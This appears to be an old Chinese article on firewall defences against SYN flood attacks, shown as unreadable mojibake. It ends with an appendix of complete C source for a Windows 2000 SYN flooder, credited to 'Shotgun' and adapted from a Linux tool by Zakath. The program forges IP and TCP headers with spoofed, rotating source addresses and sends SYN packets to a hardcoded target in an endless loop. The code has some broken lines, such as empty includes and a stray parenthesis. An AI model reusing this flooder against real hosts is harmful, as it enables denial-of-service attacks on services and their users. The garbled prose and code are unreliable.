°°¸Ë¡^¡C ¹ï©ó¨¾¤õÀð¨Ó»¡¡A¨¾¿mSYN Flood§ðÀ»ªº¤èªk¨ú¨M©ó¨¾¤õÀð¤u§@ªº°ò¥»­ì²z¡A¤@¯ë»¡¨Ó¡A ¨¾¤õÀð¥i¥H¤u§@¦bTCP¼h¤§¤W©ÎIP¼h¤§¤U¡A¤u§@¦bTCP¼h¤§¤Wªº¨¾¤õÀðºÙ¬°¹h¹D«¬¨¾¤õÀð¡A ¹h¹D«¬¨¾¤õÀð»P¦øªA¾¹¡B«È¤á¾÷¤§¶¡ªºÃö«Y¦p¤U¹Ï©Ò¥Ü¡G ¥~³¡TCP³s±µ ¤º³¡TCP³s±µ [«È¤á¾÷] =================>[¨¾¤õÀð] =================>[¦øªA¾¹] ¦p¤W¹Ï©Ò¥Ü¡A«È¤á¾÷»P¦øªA¾¹¤§¶¡¨Ã¨S¦³¯u¥¿ªºTCP³s±µ¡A«È¤á¾÷»P¦øªA¾¹¤§¶¡ªº©Ò¦³¸ê ®Æ¥æ´«³£¬O³q¹L¨¾¤õÀð¥N²zªº¡A¥~³¡ªºDNS¸ÑªR¤]¦P¼Ë«ü¦V¨¾¤õÀð¡A©Ò¥H¦pªGºô¯¸³Q§ðÀ» ¡A¯u¥¿¨ü¨ì§ðÀ»ªº¬O¨¾¤õÀð¡A³oºØ¨¾¤õÀðªºÀuÂI¬Oí©w©Ê¦n¡A§Ü¥´À»¯à¤O±j¡A¦ý¬O¦]¬°©Ò ¦³ªºTCP³ø¤å³£»Ý­n¸g¹L¨¾¤õÀðÂàµo¡A©Ò¥H®Ä²v¤ñ¸û§C¥Ñ©ó«È¤á¾÷¨Ã¤£ª½±µ»P¦øªA¾¹«Ø¥ß ³s±µ¡A¦bTCP³s±µ¨S¦³§¹¦¨®É¨¾¤õÀ𤣷|¥h¦V«á»Oªº¦øªA¾¹«Ø¥ß·sªºTCP³s±µ¡A©Ò¥H§ðÀ»ªÌ µLªk¶V¹L¨¾¤õÀ𪽱µ§ðÀ»«á»O¦øªA¾¹¡A¥u­n¨¾¤õÀ𥻨­°µªº¨¬°÷±j§§¡A³oºØ¬[ºc¥i¥H©è§Ü ¬Û·í±j«×ªºSYN Flood§ðÀ»¡C¦ý¬O¥Ñ©ó¨¾¤õÀð¹ê»Ú«Ø¥ß TCP³s±µ¼Æ¬°¥Î¤á³s±µ¼Æªº¨â­¿¡]¨¾ ¤õÀð¨âºÝ³£»Ý­n«Ø¥ßTCP³s±µ¡^¡A ¦P®É¤S¥N²z¤F©Ò¦³ªº¨Ó¦Û¥Î¤áºÝªºTCP½Ð¨D©M¸ê®Æ¶Ç°e¡A¦b¨t²Î³X°Ý¶q¸û¤j®É¡A¨¾¤õÀð¦Û¨­ ªº­t²ü·|¤ñ¸û °ª¡A©Ò¥H³oºØ¬[ºc¨Ã¤£¯à¾A¥Î©ó¤j«¬ºô¯¸¡C¡]§Ú·Pı¡A¹ï©ó³o¼Ëªº¨¾¤õÀð¬[ºc¡A¨Ï¥ÎTCP STATE§ðÀ»¦ô­p·|¬Û·í¦³®Ä:¡^ ¤u§@¦bIP¼h©ÎIP¼h¤§¤Uªº¨¾¤õÀð¡]¸ô¥Ñ«¬¨¾¤õÀð¡^¤u§@­ì²z¦³©Ò¤£¦P¡A¥¦»P¦øªA¾¹¡B«È¤á¾÷ ªºÃö«Y¦p¤U¹Ï©Ò¥Ü¡G [¨¾¤õÀð] ¸ê®Æ¥]­×§ïÂàµo [«È¤á¾÷]========|=======================>[¦øªA¾¹] TCP³s±µ «È¤á¾÷ª½±µ»P¦øªA¾¹¶i¦æTCP³s±µ¡A¨¾¤õÀð°_ªº¬O¸ô¥Ñ¾¹ªº§@¥Î¡A¥¦ºIÀò©Ò¦³³q¹Lªº¥]¨Ã ¶i¦æ¹LÂo¡A³q¹L¹LÂoªº¥]³QÂàµoµ¹¦øªA¾¹¡A¥~³¡ªºDNS¸ÑªR¤]ª½±µ«ü¦V¦øªA¾¹¡A³oºØ¨¾¤õ ÀðªºÀuÂI¬O®Ä²v°ª¡A¥i¥H¾AÀ³100Mbps-1Gbpsªº¬y¶q¡A¦ý¬O³oºØ¨¾¤õÀð¦pªG°t¸m¤£·í¡A¤£ ¶È¥i¥HÅý§ðÀ»ªÌ¶V¹L¨¾¤õÀ𪽱µ§ðÀ»¤º³¡¦øªA¾¹¡A¬Æ¦Ü¦³¥i¯à©ñ¤j§ðÀ»ªº±j«×¡A¾É­P¾ã­Ó¨t ²Î±Y¼ì¡C ¦b³o¨âºØ°ò¥»¼Ò«¬¤§¥~¡A¦³¤@ºØ·sªº¨¾¤õÀð¼Ò«¬¡A§Ú­Ó¤H»{¬°ÁÙ¬O¤ñ¸û¥©§®ªº¡A¥¦¶°¤¤¤F ¨âºØ¨¾¤õÀðªºÀu¶Õ¡A³oºØ¨¾¤õÀ𪺤u§@­ì²z¦p¤U©Ò¥Ü¡G ²Ä¤@¶¥¬q¡A«È¤á¾÷½Ð¨D»P¨¾¤õÀð«Ø¥ß³s±µ¡G SYN SYN+ACK ACK [«È¤á¾÷]---- >[¨¾¤õÀð] => [¨¾¤õÀð]-------- >[«È¤á¾÷] => [«È¤á¾÷]--- >[¨¾¤õÀð] ²Ä¤G¶¥¬q¡A¨¾¤õÀ𰰸˦¨«È¤á¾÷»P«á»Oªº¦øªA¾¹«Ø¥ß³s±µ [¨¾¤õÀð]< =========== >[¦øªA¾¹] TCP³s±µ ²Ä¤T¶¥¬q¡A¤§«á©Ò¦³±q«È¤á¾÷¨ÓªºTCP³ø¤å¨¾¤õÀ𳣪½±µÂàµoµ¹«á»Oªº¦øªA¾¹ ¨¾¤õÀðÂàµo 
[«È¤á¾÷]< ======|======= >[¦øªA¾¹] TCP³s±µ ³oºØµ²ºc§l¨ú¤F¤W¨âºØ¨¾¤õÀðªºÀuÂI¡A¬J¯à§¹¥þ±±¨î©Ò¦³ªºSYN³ø¤å¡A¤S¤£»Ý­n¹ï©Ò¦³ªº TCP¸ê®Æ³ø¤å¶i¦æ¥N²z¡A¬O¤@ºØ¨â¥þ¨ä¬üªº¤èªk¡C ªñ¨Ó¡A°ê¥~©M°ê¤ºªº¤@¨Ç¨¾¤õÀð¼t°Ó¶}©l¬ã¨s±a¼e±±¨î§Þ³N¡A¦pªG¯à¯u¥¿°µ¨ìÄY®æ±±¨î¡B ¤À°t±a¼e¡A´N¯à«Ü¤jµ{«×¤W¨¾¿mµ´¤j¦h¼Æªº©Úµ´ªA°È§ðÀ»¡A§Ú­ÌÁÙ¬O«ø¥Ø¥H«Ý§a¡C ªþ¿ý¡GWin2000¤UªºSYN Floodµ{¦¡ §ï½s¦ÛLinux¤UZakath½s¼gªºSYN Flooder ½sĶÀô¹Ò¡GVC++6.0,½sĶ®É»Ý­n¥]§tws2_32.lib ////////////////////////////////////////////////////////////////////////// // // // SYN Flooder For Win2K by Shotgun // // // // THIS PROGRAM IS MODIFIED FROM A LINUX VERSION BY Zakath // // THANX Lion Hook FOR PROGRAM OPTIMIZATION // // // // Released: [2001.4] // // Author: [Shotgun] // // Homepage: // // [http://IT.Xici.Net] // // [http://WWW.Patching.Net] // // // ////////////////////////////////////////////////////////////////////////// #include #include #include #include #define SEQ 0x28376839 #define SYN_DEST_IP "192.168.15.250"//³Q§ðÀ»ªºIP #define FAKE_IP "10.168.150.1" //°°¸ËIPªº°_©l­È¡A¥»µ{¦¡ªº°°¸ËIPÂл\¤@­ÓBÃþºô¬q #define STATUS_FAILED 0xFFFF //¿ù»~ªð¦^­È typedef struct _iphdr //©w¸qIP­º³¡ { unsigned char h_verlen; //4¦ì­º³¡ªø«×,4¦ìIPª©¥»¸¹ unsigned char tos; //8¦ìªA°ÈÃþ«¬TOS unsigned short total_len; //16¦ì¤¸Á`ªø«×¡]¦ì¤¸²Õ¡^ unsigned short ident; //16¦ì¤¸¼ÐÃÑ unsigned short frag_and_flags; //3¦ì¤¸¼Ð»x¦ì¤¸ unsigned char ttl; //8¦ì¥Í¦s®É¶¡ TTL unsigned char proto; //8¦ì¤¸¨óij (TCP, UDP ©Î¨ä¥L) unsigned short checksum; //16¦ìIP­º³¡®ÕÅç©M unsigned int sourceIP; //32¦ì·½IP¦a§} unsigned int destIP; //32¦ì¤¸¥ØªºIP¦ì§} }IP_HEADER; struct //©w¸qTCP°°­º³¡ { unsigned long saddr; //·½¦a§} unsigned long daddr; //¥Øªº¦a§} char mbz; char ptcl; //¨óijÃþ«¬ unsigned short tcpl; //TCPªø«× }psd_header; typedef struct _tcphdr //©w¸qTCP­º³¡ { USHORT th_sport; //16¦ì·½°ð USHORT th_dport; //16¦ì¤¸¥Øªº°ð unsigned int th_seq; //32¦ì§Ç¦C¸¹ unsigned int th_ack; //32¦ì½T»{¸¹ unsigned char th_lenres; //4¦ì­º³¡ªø«×/6¦ì«O¯d¦r unsigned char th_flag; //6¦ì¤¸¼Ð»x¦ì¤¸ 
USHORT th_win; //16¦ì¤¸µ¡¤f¤j¤p USHORT th_sum; //16¦ì®ÕÅç©M USHORT th_urp; //16¦ì¤¸ºò«æ¸ê®Æ°¾²¾¶q }TCP_HEADER; //CheckSum:­pºâ®ÕÅç©Mªº¤l¨ç¼Æ USHORT checksum(USHORT *buffer, int size) { unsigned long cksum=0; while(size >1) { cksum+=*buffer++; size -=sizeof(USHORT); } if(size ) { cksum += *(UCHAR*)buffer; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >>16); return (USHORT)(~cksum); } // SynFlood¥D¨ç¼Æ int main() { int datasize,ErrorCode,counter,flag,FakeIpNet,FakeIpHost; int TimeOut=2000,SendSEQ=0; char SendBuf[128]={0}; char RecvBuf[65535]={0}; WSADATA wsaData; SOCKET SockRaw=(SOCKET)NULL; struct sockaddr_in DestAddr; IP_HEADER ip_header; TCP_HEADER tcp_header; //ªì©l¤ÆSOCK_RAW if((ErrorCode=WSAStartup(MAKEWORD(2,1),&wsaData))!=0){ fprintf(stderr,"WSAStartup failed: %d\n",ErrorCode); ExitProcess(STATUS_FAILED); } SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED)); if (SockRaw==INVALID_SOCKET){ fprintf(stderr,"WSASocket() failed: %d\n",WSAGetLastError()); ExitProcess(STATUS_FAILED); } flag=TRUE; //³]¸mIP_HDRINCL¥H¦Û¤v¶ñ¥RIP­º³¡ ErrorCode=setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int)) ; If (ErrorCode==SOCKET_ERROR) printf("Set IP_HDRINCL Error!\n"); __try{ //³]¸mµo°e¶W®É ErrorCode=setsockopt(SockRaw,SOL_SOCKET,SO_SNDTIMEO,(char*)&TimeOut,sizeof( TimeOut)); if(ErrorCode==SOCKET_ERROR){ fprintf(stderr,"Failed to set send TimeOut: %d\n",WSAGetLastError()); __leave; } memset(&DestAddr,0,sizeof(DestAddr)); DestAddr.sin_family=AF_INET; DestAddr.sin_addr.s_addr=inet_addr(SYN_DEST_IP); FakeIpNet=inet_addr(FAKE_IP); FakeIpHost=ntohl(FakeIpNet); //¶ñ¥RIP­º³¡ ip_header.h_verlen=(4<<4 | sizeof(ip_header)/sizeof(unsigned long)); //°ª¥|¦ìIPª©¥»¸¹¡A§C¥|¦ì­º³¡ªø«× ip_header.total_len=htons(sizeof(IP_HEADER)+sizeof(TCP_HEADER)); //16¦ì¤¸Á`ªø«× ¡]¦ì¤¸²Õ¡^ ip_header.ident=1; //16¦ì¤¸¼ÐÃÑ ip_header.frag_and_flags=0; //3¦ì¤¸¼Ð»x¦ì¤¸ ip_header.ttl=128; //8¦ì¥Í¦s®É¶¡TTL ip_header.proto=IPPROTO_TCP; //8¦ì¤¸¨óij(TCP,UDP¡K) 
ip_header.checksum=0; //16¦ìIP­º³¡®ÕÅç©M ip_header.sourceIP=htonl(FakeIpHost+SendSEQ); //32¦ì·½IP¦a§} ip_header.destIP=inet_addr(SYN_DEST_IP); //32¦ì¤¸¥ØªºIP¦ì§} //¶ñ¥RTCP­º³¡ tcp_header.th_sport=htons(7000); //·½°ð¸¹ tcp_header.th_dport=htons(8080); //¥Øªº°ð¸¹ tcp_header.th_seq=htonl(SEQ+SendSEQ); //SYN§Ç¦C¸¹ tcp_header.th_ack=0; //ACK§Ç¦C¸¹¸m¬°0 tcp_header.th_lenres=(sizeof(TCP_HEADER)/4<<4|0); //TCPªø«×©M«O¯d¦ì tcp_header.th_flag=2; //SYN ¼Ð»x tcp_header.th_win=htons(16384); //µ¡¤f¤j¤p tcp_header.th_urp=0; //°¾²¾ tcp_header.th_sum=0; //®ÕÅç©M //¶ñ¥RTCP°°­º³¡¡]¥Î©ó­pºâ®ÕÅç©M¡A¨Ã¤£¯u¥¿µo°e¡^ psd_header.saddr=ip_header.sourceIP; //·½¦a§} psd_header.daddr=ip_header.destIP; //¥Øªº¦a§} psd_header.mbz=0; psd_header.ptcl=IPPROTO_TCP; //¨óijÃþ«¬ psd_header.tcpl=htons(sizeof(tcp_header)); //TCP­º³¡ªø«× while(1) { //¨Cµo°e10,240­Ó³ø¤å¿é¥X¤@­Ó¼Ð¥Ü²Å printf("."); for(counter=0;counter<10240;counter++){ if(SendSEQ++==65536) SendSEQ=1; //§Ç¦C¸¹°j°é //§ó§ïIP­º³¡ ip_header.checksum=0; //16¦ìIP­º³¡®ÕÅç©M ip_header.sourceIP=htonl(FakeIpHost+SendSEQ); //32¦ì·½IP¦a§} //§ó§ïTCP­º³¡ tcp_header.th_seq=htonl(SEQ+SendSEQ); //SYN§Ç¦C¸¹ tcp_header.th_sum=0; //®ÕÅç©M //§ó§ïTCP Pseudo Header psd_header.saddr=ip_header.sourceIP; //­pºâTCP®ÕÅç©M¡A­pºâ®ÕÅç©M®É»Ý­n¥]¬ATCP pseudo header memcpy(SendBuf,&psd_header,sizeof(psd_header)); memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_header)); tcp_header.th_sum=checksum((USHORT *)SendBuf,sizeof(psd_header)+sizeof(tcp_ header)); //­pºâIP®ÕÅç©M memcpy(SendBuf,&ip_header,sizeof(ip_header)); memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header)); memset(SendBuf+sizeof(ip_header)+sizeof(tcp_header),0,4); datasize=sizeof(ip_header)+sizeof(tcp_header); ip_header.checksum=checksum((USHORT *)SendBuf,datasize); //¶ñ¥Rµo°e½w½Ä°Ï memcpy(SendBuf,&ip_header,sizeof(ip_header)); //µo°eTCP³ø¤å ErrorCode=sendto(SockRaw, SendBuf, datasize, 0, (struct sockaddr*) &DestAddr, sizeof(DestAddr)); if (ErrorCode==SOCKET_ERROR) printf("\nSend 
Error:%d\n",GetLastError()); }//End of for }//End of While }//End of try __finally { if (SockRaw != INVALID_SOCKET) closesocket(SockRaw); WSACleanup(); } return 0; }